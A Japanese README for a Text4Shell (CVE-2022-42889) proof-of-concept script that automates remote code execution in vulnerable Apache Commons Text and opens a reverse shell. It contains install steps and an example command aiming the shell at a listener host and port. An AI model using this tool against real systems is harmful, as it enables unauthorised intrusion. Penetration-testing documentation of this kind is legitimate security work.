
# CVE-2022-42889(Text4Shell)の概念実証(PoC) Apache Commons Text 1.10.0 より前のバージョンを対象とした CVE-2022-42889(Text4Shell)の概念実証(PoC)です。このスクリプトは、スクリプト補間を介したリモートコード実行(RCE)を自動化し、リバースシェルを確立します。このバージョンは、Exploit-DB(ID: 52261)にある元のエクスプロイトを基にした構造化された最適化版です。
このスクリプトは、Apache Commons Text(バージョン < 1.10.0)に存在する CVE-2022-42889 脆弱性(別名 Text4Shell)を悪用するために設計されたペネトレーションテストツールです。リバースシェルを発動させる Java ベースのペイロードの配信を自動化します。
この実装は公開エクスプロイトに基づいています: https://www.exploit-db.com/exploits/52261
このスクリプトには Python 3 と requests ライブラリが必要です。
pip install requests
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139
このツールは教育目的および許可されたペネトレーションテストのみを対象としています。作者は、このスクリプトの誤用またはそれによって生じた損害について一切の責任を負いません。